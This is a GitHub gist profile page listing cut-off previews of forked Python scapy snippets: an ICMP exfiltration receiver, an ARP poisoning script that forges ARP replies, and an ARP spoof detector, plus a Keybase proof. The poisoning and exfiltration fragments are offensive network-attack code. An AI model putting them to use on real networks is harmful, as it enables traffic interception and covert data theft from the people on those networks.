Skip to content

Instantly share code, notes, and snippets.

View outhex's full-sized avatar

outhex

  • Stuck in the multiverse
View GitHub Profile
@outhex
outhex / icmp_exfiltration.py
Created September 29, 2021 00:41 — forked from maxrodrigo/icmp_exfiltration.py
ICMP Exfiltration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP
def process_packet(packet):
if packet.haslayer(ICMP) and packet[ICMP].type == 0:
data = packet[ICMP].load[-8:]
try:
@outhex
outhex / arppoison.py
Created September 29, 2021 00:37 — forked from ReddyyZ/arppoison.py
Script for ARP Poisoning attacks
from scapy.all import *
def get_mac_address(ip):
arp_broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip) # Cria o pacote falso de ARP Request
ans, uns = srp(arp_broadcast, timeout=2, verbose=0) # Envia o pacote e espera uma resposta
return ans[0][1][1].hwsrc
def poison_arp(dest_ip, dest_mac, src_ip):
arp_spoof = ARP(op=2, psrc=src_ip, pdst=dest_ip, hwdst=dest_mac) # Cria o pacote falso
@outhex
outhex / arpspoof-detector.py
Created September 29, 2021 00:37 — forked from An4ndita/arpspoof-detector.py
Program to detect ARPSPOOF attack
import scapy.all as scapy
def mac(ipadd):
arp_request = scapy.ARP(pdst=ipadd)
br = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_req_br = br / arp_request
list_1 = scapy.srp(arp_req_br, timeout=5, verbose=False)[0]
return list_1[0][1].hwsrc
def sniff(interface):

Keybase proof

I hereby claim:

  • I am outhex on github.
  • I am outhex (https://keybase.io/outhex) on keybase.
  • I have a public key ASBvz8o801USyqhjTPO-fE40b5WA43jZ0bjuJWJfclMeWAo

To claim this, I am signing this object: